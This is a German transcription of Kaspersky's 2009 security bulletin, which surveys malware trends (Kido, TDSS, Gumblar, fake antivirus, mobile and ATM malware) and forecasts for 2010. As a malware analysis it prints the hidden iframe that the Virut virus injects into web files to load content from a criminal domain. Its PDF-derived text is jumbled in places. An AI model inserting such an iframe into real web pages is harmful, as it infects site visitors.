Teil 1 - Kaspersky Lab

Transcription

Kaspersky Security Bulletin
2
0
0
9
Teil 1:
Entwicklung der IT-Bedrohungen
Teil 2:
Malware-Statistik
Teil 3:
Spam
w w w . k a s p e r s k y . d e
Kaspersky Security Bulletin 2009
2
Teil 1: Entwicklung der IT-Bedrohungen................. 4
Teil 3: Spam.............................................................. 18
Trends des Jahres.................................................................4
Die Themen des Jahres 2009...............................................5
Zunehmende Komplexität.....................................................5
Epidemien.............................................................................6
Angriffe auf die Computer der User.......................................6
Infizierungen von Web-Ressourcen......................................7
Betrug....................................................................................7
Schadprogramme für alternative Betriebssysteme...............8
Prognosen.............................................................................9
Zahlen und Fakten des Jahres............................................18
Spam-Anteil.........................................................................18
Spam-Ursprungsländer.......................................................18
Spam-Themen.....................................................................19
Spam und die Krise.............................................................19
Betrugsversuche durch Spam.............................................20
Phishing...............................................................................21
SMS-Betrug in Spam...........................................................21
Größe und Typen von Spam-Mails......................................22
Methoden und Tricks der Spammer....................................23
Spam und soziale Netzwerke..............................................24
Schadprogramme in E-Mails...............................................25
Fazit.....................................................................................26
Teil 2: Malware-Statistik.......................................... 10
Schadprogramme im Internet (Web-Attacken)....................10
Die Top 20 der Schadprogramme im Internet...................... 11
Netzattacken.......................................................................12
Lokale Infektionen...............................................................13
Schwachstellen...................................................................14
3
Teil 1: Entwicklung der IT-Bedrohungen
Trends des Jahres
Das Jahr 2009 wurde zu einem weiteren Meilenstein
sowohl in der Geschichte der Schadprogramme als
auch in der Geschichte der Cyberkriminalität, denn
wieder einmal hat die Entwicklung in beiden Bereichen
eine völlig neue Richtung eingeschlagen. In diesem
Jahr wurde der Grundstein für das gelegt, was wir in
den nächsten Jahren zu erwarten haben.
In den Jahren 2007 und 2008 starb Schadsoftware,
die keinem kommerziellen Zweck diente, praktisch
aus. Informationen stehlende Trojaner wurden zu der
wichtigsten Schädlings-Gattung. Im Visier der Kriminellen standen dabei in erster Linie Spieler von OnlineGames, insbesondere ihre Passwörter, ihre Spielcharaktere sowie virtuelle Wertsachen.
Im Laufe der letzten drei bis vier Jahre mauserte sich
China zum Hauptlieferanten schädlicher Software. Der
chinesische Cyberuntergrund konnte derartige Unmengen an Schadprogrammen produzieren, dass in
den letzten zwei Jahren ausnahmslos alle AntivirenHersteller einen Großteil ihrer Energien auf die Abwehr
dieses Stroms verwenden mussten.
Im Laufe der Jahre 2007 bis 2009 stieg die Anzahl neuer Bedrohungen kontinuierlich an. Die Reaktion darauf
konnte nur in der Entwicklung noch leistungsfähigerer
Antiviren-Labore bestehen (und der damit verbundenen
Entwicklung von In-the-Cloud-AV-Technologien), in der
Entwicklung neuer automatischer Erkennungsmethoden, der Umsetzung neuer heuristischer Analyse-Praktiken, der Entwicklung von Virtualisierungstechnologien
und der Verhaltensanalyse.
Auf die Zunahme der Bedrohungen reagierte die AVIndustrie mit der Entwicklung neuer Technologien, um
den Schutz der Anwender-Computer zu optimieren. Es
ist nicht übertrieben, von einer technischen Revolution
zu sprechen. Boten die Standard-AV-Lösungen der
90er Jahre (Scanner und Überwachungstools) noch im
Jahr 2006 völlig ausreichenden Schutz, so waren sie
2009 bereits vollkommen überholt und praktisch komplett von Internet-Security-Produkten verdrängt, die
viele mehrschichtige Schutztechnologien miteinander
kombinieren.
Während die Anzahl neuer Bedrohungen in den Jahren
2007 bis 2008 in arithmetischer Progression anstieg,
wurden 2009 in etwa gleich viele neue Schadprogramme entdeckt wie im Jahr 2008, nämlich um die 15
Millionen.
Die Statistiken der einzelnen AV-Unternehmen weichen
zwar voneinander ab, weil die einen Dateien zählen,
die anderen Signaturen und wiederum andere die Angriffe. Doch sie alle spiegeln den deutlichen Zuwachs
an neuen Schadprogrammen in der jüngsten Vergangenheit wider. Während Kaspersky Lab innerhalb von
15 Jahren (von 1992 bis 2007) rund 2 Millionen eigenständiger Schadprogramme entdeckte, waren es 2008
und damit nur innerhalb eines Jahres insgesamt 15
Millionen!
Im Jahr 2009 stieg die Zahl der Schadprogramme in
den Datenbanken von Kaspersky Lab auf 33,9 Millionen.
Anzahl neuer, im Laufe eines Jahres von Kaspersky
Lab entdeckter Schadprogramme (2003 bis 2009)
Für diese Stabilisierung gibt es mehrere Gründe: Der
Boom des Jahres 2008 ist nicht allein auf die rege
Viren-Entwicklung in China zurückzuführen, sondern
auch auf die Weiterentwicklung der Technologien zur
Infizierung von Dateien (was zu einem Anstieg einzigartiger Schaddateien führte) sowie auf die neue Ausrichtung im Bereich der Browser-Angriffe.
Anzahl der in den Datenbanken von Kaspersky Lab
enthaltenen Schadprogramme
4
Diese Tendenzen haben sich im Jahr 2009 zweifellos
fortgesetzt, allerdings ohne weitere bahnbrechende
Entwicklung. Zudem gab es weniger Aktivität von verschiedenen trojanischen Programmen, insbesondere
Game-Trojanern. Diesbezüglich hat sich die Prognose
bestätigt, die Kaspersky Lab bereits Ende 2008 abgegeben aht. Dass diese Vorhersage eintreffen würde,
zeichnete sich schon Mitte 2009 ab. Der starke Konkurrenzdruck auf dem Markt, die geringeren Einnahmen
Die mengenmäßige Abnahme von Game-Trojanern
ist auch dem gestiegenen Sicherheitsbewusstsein der
Online-Game-Hersteller zuzuschreiben, aufgrund dessen viele Spieler von Online-Games begonnen haben,
entsprechende Maßnahmen gegen derartige Bedrohungen zu ergreifen.
Auch der erfolgreiche Kampf von Justiz und Sicherheitsbehörden, Telekommunikationsanbietern und der
Antiviren-Industrie gegen illegale Internet-HostingServices hat zum Rückgang von Schadprogrammen
geführt. Der Grundstein hierfür wurde bereits Ende
2008 gelegt, als Anbieter wie zum Beispiel McColo,
Atrivo und EstDomains vom Netz genommen wurden.
Im Jahr 2009 setzte sich dieser Kampf fort und führte
dazu, dass auch UkrTeleGroup, RealHost und 3FN ihre
Aktivitäten einstellen mussten.
Die genannten Services hatten es zu trauriger Berühmtheit gebracht, denn sie stellten Cyberkriminellen
und Spammern jeglicher Couleur verschiedene Dienstleistungen zur Verfügung, darunter Steuerungszentren
für Botnetze, Phishing-Ressourcen, Websites mit Exploits und vieles mehr.
Die Schließung „grauer“ Hosting-Plattformen führte leider nicht dazu, dass die Betrüger ihre Aktivität komplett
einstellten, denn schon bald fanden sie einen neuen
Schlupfwinkel. Das Internet war jedoch ein relativ sicherer Ort, solange die Cyberkriminellen noch vollauf
mit ihrem „Umzug“ beschäftigt waren.
Bisher deutet alles darauf hin, dass sich diese Tendenz
fortsetzt und die Zahl neuer Schadprogramme im Jahr
2010 in etwa der Anzahl der 2009 entwickelten Schädlinge entsprechen wird.
Die Themen des Jahres 2009
Zu den wichtigsten Themen des Jahres 2009 zählen:
komplexe Schadprogramme mit Rootkit-Funktionalität,
globale Epidemien, der Wurm Kido, Web-Attacken und
Botnetze, SMS-Betrügereien sowie Angriffe auf soziale
Netzwerke.
Zunehmende Komplexität
Im Jahr 2009 wurden die Schadprogramme wesentlich
komplizierter und komplexer. Gab es beispielsweise
bisher nur einige Dutzend Schadprogramm-Familien,
die über Rootkit-Funktionalität verfügen, so waren derartige Programme im Jahr 2009 nicht nur überaus weit
verbreitet, sondern sie hatten sich auch technisch entscheidend verbessert. Besonders erwähnenswert sind
in diesem Zusammenhang die Schädlinge Sinowal
(Bootkit), TDSS und Clampi.
Bereits seit zwei Jahren verfolgen die Experten von
Kaspersky Lab die Entwicklung von Sinowal, und im
Frühjahr 2009 beobachteten sie eine neue Verbreitungswelle des Bootkits. Gut im System verborgen
und daher von den meisten Antiviren-Programmen
unentdeckt war Sinowal das am weitesten entwickelte Schadprogramm überhaupt. Zudem hat sich der
Schädling aktiv gegen die Versuche der Antiviren-Unternehmen gewehrt, die Botnetz-Steuerungszentren zu
zerschlagen.
Das Bootkit verbreitete sich hauptsächlich über gehackte Websites, Porno-Ressourcen und Seiten, die
Piraten-Software zum Download bereitstellen. Praktisch alle Server, über welche die Computer der Anwender infiziert wurden, waren Teil so genannter „Partnerprogramme“ – einer Art von Zusammenarbeit zwischen
Inhabern von Websites und Schadprogramm-Autoren.
Solche „Partnerschaften“ sind im russischen und ukrainischen Cyber-Untergrund überaus populär.
Der Schädling TDSS verkörpert die Umsetzung gleich
zweier überaus komplexer Technologien: Er infiziert die
Windows-Systemdateien und erstellt ein eigenes virtuelles Dateisystem, in dem sich sein Haupt-Schadcode
verbirgt. TDSS ist als erstes Schadprogramm überhaupt in der Lage, auf dieser Ebene in das System einzudringen. Davor waren keine schädlichen Programme
dieser Art bekannt.
Clampi geriet im Sommer 2009 in den Fokus der Experten, nachdem in einigen amerikanischen Großkonzernen und Behörden eine Infizierung mit diesem
Schadprogramm festgestellt wurde. Dieser Schädling
trat 2008 erstmals in Erscheinung, ist anscheinend russischen Ursprungs und stiehlt die Zugangsdaten zu einer Reihe von Online-Banking-Systemen. Die ClampiVersion des Jahres 2009 unterscheidet sich von seinen
Vorgängern nicht nur durch eine komplizierte, mehrere
Module umfassende Struktur, deren Aufbau der von
Zbot ähnelt, einem anderen berüchtigten Trojaner. Neu
ist außerdem das raffinierte Kommunikationsschema
des dazugehörigen Botnetzes, das den Datenverkehr
mit einem RSA-Algorithmus verschlüsselt.
der Kriminellen sowie die aktive Gegenwehr der Antiviren-Unternehmen – all diese Faktoren führten dazu,
dass die Zahl der Game-Trojaner abnahm, was Mitte
2009 auch von anderen AV-Anbietern berichtet wurde.
Eine andere bemerkenswerte Eigenschaft von Clampi:
Der Schädling verwendet die Windows-Standard-Tools
eines infizierten Rechners, um sich innerhalb lokaler
Netzwerke zu verbreiten. Das führte zu verschiedenen
Problemen für einige Antiviren-Programme, die nicht in
der Lage sind, „vertrauenswürdige Anwendungen“ zu
blockieren, und daher in diesem Fall auch die Infizierung nicht verhindern konnten.
Leider sind diese Bedrohungen auch überaus stark
im Internet verbreitet. Sowohl Sinowal als auch Clampi brachten es zu weltumspannenden Epidemien, und
TDSS war die Ursache einer der umfassendsten Epidemien des Jahres 2009. Besonders weit verbreitet war
die Variante Packed.Win32.Tdss.z, die im September
in Erscheinung trat und von seinem Autor den Namen
TDL 3 erhielt.
5
Epidemien
Für 2009 sagte Kaspersky Lab eine Zunahme der globalen Epidemien im Vergleich zum Vorjahr voraus, und
leider hat sich diese Prognose voll und ganz bestätigt.
Nicht nur die bereits beschriebenen Bedrohungen riefen globale Epidemien hervor, sondern auch eine ganze Reihe anderer gefährlicher Schadprogramme.
Angriffe auf die Computer der User
Die im Kaspersky Security Network gesammelten Daten zeigen, dass die folgenden Schadprogramme im
Jahr 2009 jeweils mehr als eine Million Systeme angegriffen haben:
► Kido - Wurm
► Sality – Virus-Wurm
► Brontok - Wurm
► Mabezat - Wurm
► Parite.b – Dateivirus
► Virut.ce – Bot-Virus
► Sohanad - Wurm
► TDSS.z – Rootkit-Backdoor
Ganz ohne Zweifel ging die umfassendste Epidemie des vergangenen Jahres auf das Konto von Kido
(Conficker), der Millionen von Computern rund um den
Erdball infizierte. Der Wurm setzte verschiedene Techniken ein, um in Rechner einzudringen: Er fing Passwörter für Netzressourcen ab, verbreitete sich über
Flash-Speicher und nutzte die Sicherheitslücke Windows MS08-067 aus. Jeder infizierte Computer wurde als Zombie-Rechner in ein Botnetz eingereiht. Der
Kampf gegen das auf diese Weise aufgebaute ZombieNetzwerk wurde dadurch erschwert, dass in Kido die
modernsten und effektivsten Technologien der Viren
schreiberzunft umgesetzt wurden. So empfing eine
der Wurm-Modifikationen beispielsweise per Update
eine Liste von fünfhundert Domains, deren Adressen
nach dem Zufallsprinzip aus einem täglich erstellten
Verzeichnis von 50.000 Adressen ausgewählt wurden.
Als zusätzlicher Update-Kanal diente zudem eine P2PVerbindung. Kido versucht überdies die Aktualisierung
von Schutzprogrammen zu verhindern, deaktiviert den
Windows-Sicherheitsdienst, blockiert den Zugriff auf
Websites von Antiviren-Herstellern und vieles mehr.
Bis März 2009 waren die Entwickler von Kido nicht
sonderlich aktiv. Nach Einschätzungen der Kaspersky-
Experten gelang es dem Schädling bis dahin, weltweit
an die fünf Millionen Computer zu infizieren. Kido verfügte nicht über die Möglichkeit, Spam zu versenden
oder DDoS-Attacken zu organisieren. Fachleute erwarteten das Auftreten dieser Funktionen zum ersten April
2009, da die im März verbreitete Version von Kido genau an diesem Datum den Versuch unternehmen sollte,
zusätzliche Module zu laden. Die Kido-Autoren zogen
es allerdings vor, noch einige Tage damit zu warten,
und erst in der Nacht vom 8. auf den 9. April empfingen
die befallenen Computer den Update-Befehl per P2PVerbindung. Dabei wurde nicht nur Kido selbst aktuali-
6
siert, sondern auf die infizierten Rechner wurden zwei
weitere Programme geladen. Bei dem ersten handelte
es sich um einen E-Mail-Wurm aus der Familie EmailWorm.Win32.Iksmas, der für den Versand von Spam
verantwortlich ist. Das zweite Programm war ein gefälschtes Antiviren-Programm der Familie FraudTool.
Win32.SpywareProtect2009, das Geld für die Beseitigung angeblich gefundener Schadprogramme fordert.
Um eine derart weit verbreitete Bedrohung effektiv zu bekämpfen, wurde eigens die Einsatzgruppe
„Conficker Working Group“ ins Leben gerufen – eine
Task-Force unter Mitwirkung verschiedener AntivirenUnternehmen, Internet-Provider, unabhängiger Forschungsorganisationen, Bildungseinrichtungen und
Regulierungsbehörden. Es handelt sich dabei um eine
bis dahin nie dagewesene, breit angelegte internationale Zusammenarbeit, die über die üblichen Kontakte
der Antiviren-Experten untereinander weit hinausgeht.
Die „Conficker Working Group“ kann damit als gute
Basis für eine ständige Organisation dienen, die sich
dem Kampf gegen Bedrohungen verschreibt, die die
gesamte Welt terrorisieren.
Die Kido-Epidemie setzte sich das gesamte Jahr 2009
fort. Im November überschritt die Zahl der infizierten
Computer die 7-Millionen-Marke.
Entwicklung der Kido-Epidemie, Quelle: www.shadowserver.org (www.shadowserver.org/wiki/uploads/Stats/
conficker-population-year.png)
Ausgehend von der Erfahrung mit älteren Würmern wie
Lovesan, Sasser und Slammer, die nach demselben
Prinzip funktionierten, ist davon auszugehen, dass sich
die globale Kido-Epidemie auch im Jahr 2010 fortsetzen wird.
Keineswegs außer Acht lassen kann man die durch den
Virus Virut hervorgerufene Epidemie. Das Besondere
an Virus.Win32.Virut.ce ist dessen Angriffsziel, nämlich
Webserver. Auch der Infizierungsmechanismus dieses
Schädlings ist durchaus erwähnenswert: Der Virus infiziert nicht nur ausführbare Dateien der Erweiterungen
.EXE und .SCR, sondern fügt den HTML-, PHP- und
ASP-Webdateien des infizierten Servers einen speziellen Code in Form eines Links hinzu, der zum Beispiel
so aussieht:
<iframe src=“http://ntkr(xxx).info/cr/?i=1“
width=1 height=1>
</ iframe>
Infizierungen von Web-Ressourcen
Eine der umfassendsten Epidemien im Internet betraf
zehntausende von Webseiten und wurde von verschiedenen Angriffswellen des Schädlings Gumblar ausgelöst. Die erste Version des Schädlings infizierte legale
Websites mit einem Skript. Das eingeschleuste Skript
leitete die Anfragen von Besuchern unbemerkt auf die
Website der Kriminellen um, über die dann schädliche
Software verbreitet wurde.
Gumblar wurde nach der schädlichen Website benannt,
auf die Besucher gehackter Webseiten im Verlauf der
ersten Angriffswelle umgeleitet wurden, und die deren
Rechner anschließend mit Malware infizierte. Diese Attacken waren ein Paradebeispiel für die Technologien
der Generation Malware 2.5, über die wir zu Beginn
des vergangenen Jahres bereits berichteten.
Im Herbst 2009 wurden auf den gehackten Webseiten
Links plaziert, die nicht mehr auf die Sites der Kriminellen führten, sondern auf andere legale, infizierte
Webseiten, was die Bekämpfung der Gumblar-Epidemie weiter erschwerte.
Warum breitet sich Gumblar dermaßen schnell aus?
Die Antwort ist einfach: Es handelt sich um ein voll
automatisiertes System. Wir haben es mit einer neuer
Generation sich selbst aufbauender Botnetze zu tun.
Das System greift die Besucher von Websites offensiv an und stiehlt nach der Infizierung ihrer Computer
Zugangsdaten für FTP-Server mit Hilfe einer ausführbaren Windows-Datei. Die FTP-Server-Accounts werden anschließend zur Infizierung aller Seiten auf neuen
Webservern benutzt. Auf diese Weise treibt das System die Zahl der befallenen Seiten in die Höhe. Dieser
Prozess ist komplett automatisiert, und die Betreiber
des schädlichen Netzwerks müssen lediglich die Arbeit
des Systems regulieren, die Exploits für die Angriffe auf
Browser auswählen und die ausführbare trojanische
Datei aktualisieren, welche die Zugangsdaten stiehlt.
Das System funktioniert als geschlossener Kreislauf:
Aus dem Angriff auf neue Computer stammen die Kontodaten für neue FTP-Server, mit deren Hilfe wiederum
neue Server infiziert werden.
Betrug
Immer vielfältiger werden auch die im Internet kursierenden Betrugsmaschen. Zu dem bereits traditionellen
und überaus verbreiteten Phishing gesellten sich verschiedene „graue“ Websites, die kostenpflichtigen Zugriff auf nicht existierende Services anbieten. Absolu-
ter Spitzenreiter ist in dieser Hinsicht leider Russland.
Ausgerechnet russische Betrüger produzierten wie am
Fließband Sites mit dem Angebot, „den Aufenthaltsort
von Personen mittels GSM herauszufinden“, „private
Korrespondenz in sozialen Netzwerken zu lesen“, „Informationen zu sammeln“ und so weiter und so fort.
Die komplette Auflistung aller Angebote würde mehrere
Seiten füllen. Um einen derartigen Dienst in Anspruch
nehmen zu können, wird der Anwender in allen Fällen
aufgefordert, eine SMS an eine Premium-Nummer zu
senden, wobei nicht darauf hingewiesen wird, dass der
Preis für eine solche SMS bis zu 10 US-Dollar betragen
kann. Alternativ muss sich der Anwender wiederum mit
Hilfe einer SMS auf irgendeine Weise „registrieren“,
woraufhin täglich Geld von seinem Mobiltelefon-Konto
abgebucht wird.
Auf dem Höhepunkt ihrer Aktivität gab es mehrere Hundert derartiger Services, deren Betrieb Dutzende von
„Partner-Programmen“ beschäftigte. Um vertrauensselige User anzulocken, wurde sowohl traditioneller
E-Mail-Spam als auch Spam in sozialen Netzwerken
und IM-Spam eingesetzt. Zur Umsetzung des SpamVersands führten die Kriminellen Virus- und PhishingAttacken durch und konnten sich so Zugriff auf die
Accounts der User verschaffen. Sie erstellten außerdem Dutzende von gefälschten Social-Network-Sites –
um nur einige ihrer Tricks zu nennen. Erst gegen Ende
2009 trafen diese Praktiken auf ernst zu nehmende
Gegenwehr von Mobilfunkanbietern, Administrationen
sozialer Netzwerke und Antiviren-Herstellern.
Im Zusammenhang mit Kido hat Kaspersky Lab bereits
über den Download eines weiteren Schadprogramms
berichtet, und zwar eines gefälschten Antiviren-Programms. Malware dieser Art informiert den User über
die Entdeckung von Schadprogrammen auf dem Computer und bietet gegen Geld an, die angeblich aufgetretenen Fehler zu beseitigen und das System zu desinfizieren. In Wirklichkeit finden und desinfizieren die
falschen Antiviren-Tools aber rein gar nichts. Derartige
Programme sind überaus verbreitet, und Kaspersky
Lab hat schon mehrfach darüber berichtet.
Beim Besuch einer infizierten legalen Webseite werden
ohne Wissen des Anwenders über den vom Virus hinzugefügten Link beliebige, von den Cyberkriminellen
vorbereitete schädliche Inhalte auf den Computer geladen. Daneben verbreitet sich dieser Virus in P2PNetzwerken über infizierte Key-Generatoren, die Seriennummern für populäre Programme erstellen. Das
Ziel einer Infizierung ist der Zusammenschluss aller
befallenen Rechner zu einem IRC-Botnetz, das zum
Versand von Spam verwendet wird.
2009 wurden die Pseudo-AV-Programme unter Cyber
kriminellen immer beliebter. Für deren Verbreitung
werden nicht nur andere Schadprogramme eingesetzt,
sondern auch Werbung im Internet geschaltet. Derzeit platzieren die meisten einschlägigen Sites Banner
mit Informationen über ein neues „Wunderprodukt“,
das den Anwender von allen Viren-Problemen erlöst.
Selbst auf legalen Websites ist die Wahrscheinlichkeit
recht hoch, blinkende Banner oder aufdringliche FlashWerbung für ein „neues Antiviren-Programm“ zu entdecken. Außerdem kann es passieren, dass sich während
des Surfens ein Fenster im Browser mit dem Angebot
öffnet, ein Antiviren-Programm kostenlos herunterzuladen. Je glaubwürdiger die gefälschten Sicherheits
lösungen echte, legale Software imitieren, desto größer sind die Chancen der Betrüger, Geld für die „Arbeit“
ihrer Fake-Produkte zu kassieren.
7
Die Popularität gefälschter Antiviren-Programme bei
Cyberkriminellen und die weite Verbreitung sind in erster Linie dadurch zu erklären, dass diese Tools leicht
zu entwickeln sind, sich effektiv verbreiten lassen und
den Übeltätern innerhalb kurzer Zeit hohe Gewinne
einbringen. Nach im November 2009 veröffentlichten
Schätzungen der amerikanischen Ermittlungsbehörde
FBI verdienten die Online-Kriminellen rund 150 Millionen US-Dollar mit gefälschter AV-Software (www.scmagazineus.com/fbi-fraudsters-earned-150-million-inrogue-av-scams/article/159597).
Aktuell befinden sich über 300 verschiedene Familien
gefälschter Antiviren-Programme in den Datenbanken
von Kaspersky Lab.
Schadprogramme für alternative Betriebssysteme
Auch im Jahr 2009 setzten sich die Cyberkriminellen
intensiv mit alternativen Plattformen wie zum Beispiel
mobilen Betriebssystemen und Mac OS auseinander.
Die Firma Apple, die stets versichert hatte, Schadprogramme für Mac OS würden keine Gefahr darstellen,
beschäftigte sich nun mit den Viren-Bedrohungen für
den Mac und integrierte sogar eine Art Virenscanner
in die neue Betriebssystem-Version. Bei den mobilen
Plattformen ist die Lage nach wie vor unklar. Auf der einen Seite traten schon lange erwartete Ereignisse ein:
Für das iPhone tauchten die ersten Schadprogramme
auf (Wurm Ike), für Android wurde die erste Spyware
entwickelt, und für Symbian-Smartphones wurden die
ersten Fälle mit abonnierten Schadprogrammen registriert. Auf der anderen Seite kämpfen die Betriebs
systeme selbst um Marktanteile, wodurch sie den
Virenschreibern die Entscheidung schwer machen,
auf welches OS sie ihre Anstrengungen konzentrieren
sollen.
Im Jahr 2009 entdeckte Kaspersky Lab 39 neue Familien und 257 neue Modifikationen von Schadprogrammen für mobile Geräte. Zum Vergleich: Im Jahr 2008
wurden 30 neue Familien und 143 neue Modifikationen
entdeckt. Nach Monaten gestaffelt stellt sich das Erscheinen neuer Bedrohungen wie folgt dar:
Die wichtigsten Ereignisse im Bereich mobiler Schadprogramme sind in der Kaspersky-Analyse „Virenschutz für mobile Endgeräte, Teil 3“ (www.kaspersky.
com/de/whitepaper_analysen?chapter=207717065)
beschrieben. Zu den bemerkenswertesten Vorkommnissen und Tendenzen des Jahres 2009 auf diesem
Gebiet gehören:
► Ausbildung eines kommerziellen Marktes für mobile
Schadprogramme
► Erscheinen von „abonnierten“ Schädlingen für Symbian S60 3rd Edition
► Verschiedene Spielarten von SMS-Betrügereien
► Erscheinen von Schadprogrammen mit deutlich
finanziellem Hintergrund, die in der Lage sind, mit
den Servern der Cyberkriminellen zu kommunizieren
Das Erscheinen von Schadprogrammen, die in der
Lage sind, mit den Servern der Cyberkriminellen zu
kommunizieren, ist die wohl wichtigste Entwicklung der
zweiten Jahreshälfte 2009. Zu ihrer Verbreitung haben
besonders die Zunahme von drahtlosen Netzwerken
und die geringen Gebühren für mobiles Internet beigetragen. Beide Faktoren ermöglichen es den Usern von
Smartphones und Mobiltelefonen, immer häufiger ins
Netz zu gehen.
Die Kommunikation zwischen mobilen Schadprogrammen und entfernten Servern eröffnet Online-Kriminellen
völlig neue Möglichkeiten:
SMS-Trojaner können Parameter für die zu versendenden Kurznachrichten von einem Remote-Server
entgegennehmen. Wird das Präfix blockiert, ist der Betrüger nicht gezwungen, das Schadprogramm zu aktualisieren. Er muss lediglich ein neues Präfix wählen
und dieses auf dem Server platzieren.
Auf mobilen Geräten installierte Schadprogramme
können Updates von Remote-Servern empfangen.
Die Herstellung einer Verbindung zwischen mobilen
Schadprogrammen und einem Remote-Server kann
der erste Schritt zu einem Botnetz sein, in das alle mit
diesen Schädlingen infizierten mobilen Geräte eingegliedert werden.
Kaspersky Lab geht davon aus, dass sich diese Tendenz im Jahr 2010 fortsetzen wird und uns eine große
Zahl von Schädlingen erwartet, die ihr schädliches Potential per Internet-Verbindung entfalten.
Auftreten neuer Modifikationen, jeweils 2008 und 2009
8
Zu den bedeutenden Ereignissen des Jahres 2009 zählt
auch die Entdeckung des trojanischen Programms
Backdoor.Win32.Skimer. Zwar trat dieses Ereignis bereits Ende 2008 ein, doch erst im Frühjahr 2009 wurde
es allgemein bekannt. Es handelt sich hierbei um das
erste Schadprogramm für Bankautomaten. Nach der
erfolgreichen Infizierung kann der Betrüger mit Hilfe
einer speziellen Karte verschiedene illegale Aktionen
durchführen. Er kann zum Beispiel das gesamte im
Automaten befindliche Geld abheben oder Daten über
Der Code kann auf zwei Arten in den Bankautomaten
gelangen, entweder durch direkten physischen Zugriff auf das System oder über das interne Banknetzwerk, an das der Bankautomat angeschlossen ist. Eine
herkömmliche Antiviren-Software reicht voll und ganz
aus, um dieser Backdoor den Garaus zu machen. Kaspersky Lab hat deshalb allen Banken dringend empfohlen, alle mit Bankautomaten in Verbindung stehenden
Netzwerke einem Antiviren-Scan zu unterziehen.
Prognosen
Nach Meinung der Experten von Kaspersky Lab werden wir es im Jahr 2010 mit den folgenden Ereignissen
und Problemen zu tun bekommen:
Verschiebung der Angriffsziele – von Attacken über
das Web zu Angriffen über Filesharing-Netzwerke. Diese Veränderung ist eine direkte Folge der Entwicklung
der Schutztechnologien und somit das unausweichlich
nächste Glied in der chronologischen Kette: In den Jahren 2000 bis 2005 wurden die User über E-Mail angegriffen, zwischen 2005 und 2006 erfolgten die Angriffe
über das Netz, und von 2006 bis 2009 attackierten die
Cyberkriminellen die Anwender über Websites inklusive sozialer Netzwerke. Bereits im Jahr 2009 wurde
eine ganze Reihe von umfassenden Virenepidemien
über Torrent-Dateien verbreitet. Auf diese Weise verbreiteten sich nicht nur so starke Bedrohungen wie
TDSS und Virut, sondern auch die ersten Backdoors
für Mac OS. Für 2010 erwarten wir eine deutliche Zunahme derartiger Fälle in P2P-Netzen.
Kampf um Traffic. Die Cyberkriminellen sind zunehmend bemüht, ihre Geschäfte zu legalisieren. Das Internet bietet vielfältige Möglichkeiten Geld zu verdienen,
wenn man große Mengen an speziellem Traffic zu bieten hat, der wiederum mit Hilfe von Botnetzen generiert
werden kann. Streiten sich bisher im Wesentlichen nur
Services um den Botnet-Traffic, die alle gleichermaßen
kriminell sind, so ist in der Zukunft auf dem Markt der
Botnetz-Dienstleistungen das Erscheinen halblegaler,
„grauer“ Strukturen zu erwarten. So genannte „PartnerProgramme“ bieten den Betreibern von Botnetzen die
Möglichkeit, ohne offensichtlich kriminelle Dienstleistungen wie der Versendung von Spam, DoS-Attacken
oder der Verbreitung von Viren Geld zu verdienen.
Epidemien. Der Hauptgrund für das Entstehen von
Epidemien liegt nach wie vor in der Entdeckung von
Sicherheitslücken – und zwar nicht nur in der Software von Drittanbietern (Adobe, Apple), sondern auch
in dem vor kurzem veröffentlichten neuen Microsoft-
Betriebssystem Windows 7. Es sei angemerkt, dass
die Drittanbieter die Suche nach Fehlern in ihrer Software in letzter Zeit vorangetrieben haben. Werden im
laufenden Jahr keine eklatanten Sicherheitslücken entdeckt, so könnte 2010 zu einem der ruhigsten Jahre in
der jüngsten Vergangenheit werden.
Die Schadprogramme werden technisch immer anspruchsvoller und komplizierter. Schon heute gibt es
Bedrohungen, die moderne Datei-Infizierungstechnologien und Rootkit-Funktionen einsetzen. Viele AntivirenProgramme sind nicht in der Lage, Systeme zu desinfizieren, die von Schädlingen dieser Art befallen sind.
Zukünftig wird sich die Lage weiter verschlechtern.
Einerseits werden sich die Sicherheitstechnologien dahingehend weiterentwickeln, dass den Bedrohungen
das Eindringen ins System weitestgehend erschwert
wird. Andererseits werden die Bedrohungen auch praktisch unverwundbar sein, wenn es ihnen gelingt, derart
hoch entwickelte Sicherheitssysteme zu umgehen.
Ähnlich wie den „Game-Trojanern“ wird es auch den
gefälschten AV-Programmen ergehen – ihre Zahl wird
abnehmen. Erstmals traten Programme dieser Art 2007
in Erscheinung. Im Jahr 2009 hatten sie mengenmäßig den Höchststand erreicht und waren an vielen weit
reichenden Epidemien beteiligt. Derzeit ist der Markt
an gefälschten Antiviren-Programmen übersättigt, und
dementsprechend unbedeutend sind die Einnahmen
der Betrüger auf diesem Gebiet. Auch die gesteigerte
Aufmerksamkeit, die die Antiviren-Industrie sowie Justiz und Sicherheitsbehörden derartigen Programme
widmen, macht ihnen das Leben schwer.
Im Bereich Web-Services werden Google Wave und
Angriffe über diesen Service das Thema des Jahres.
Zweifellos werden auch diese Attacken dem bereits
etablierten Schema folgen – zuerst Spam, danach
Phishing-Attacken, dann Ausnutzung von Sicherheitslücken und die Verbreitung von Schadprogrammen.
Von großem Interesse ist auch die Veröffentlichung
von Google ChromeOS — doch in diesem Jahr ist noch
nicht zu erwarten, dass die Cyberkriminellen dieser
Plattform allzu viel Aufmerksamkeit widmen werden.
die Kreditkarten der Personen sammeln, die Transak
tionen über den infizierten Automaten durchgeführt haben. Der Trojaner wurde ganz offensichtlich von einer
Person geschrieben, die mit der Soft- und Hardware
von Bankautomaten bestens vertraut ist. Die Analyse
des Trojaner-Codes legt den Schluss nahe, dass sich
das Schadprogramm speziell gegen in Russland und
der Ukraine installierte Bankautomaten richtet, denn es
verfolgt Transaktionen in US-Dollar, russischen Rubeln
und ukrainischen Grivna.
Hinsichtlich mobiler Plattformen für das iPhone
und Android erwartet Kaspersky Lab für 2010 reichlich
Komplikationen. Das Auftreten erster Bedrohungen
für diese Plattformen im Jahr 2009 zeugt davon, dass
die Cyberkriminellen ein zunehmendes Interesse daran entwickeln. Und während sich die Gefahr für die
iPhone-User nur auf diejenigen beschränkt, die gehackte Geräte verwenden, so gilt diese Einschränkung
für die Plattform Android nicht, denn die Anwendungen
hierfür können aus jeder beliebigen Quelle installiert
werden. Die wachsende Popularität von Telefonen auf
der Basis dieses Betriebssystems in China und die
unzulänglichen Kontrolltechnologien für die zu veröffentlichenden Anwendungen werden 2010 eine Reihe
spürbarer Viren-Vorfälle nach sich ziehen.
9
Schadprogramme im Internet (Web-Attacken)
Teil 2: Malware-Statistik
Die Jahresstatistik 2009 beruht auf Daten, die mit Hilfe
des Kaspersky Security Network (KSN) gewonnen und
ausgewertet wurden. KSN ist eine der wichtigsten Neuerungen bei den Produkten für Privatanwender, und
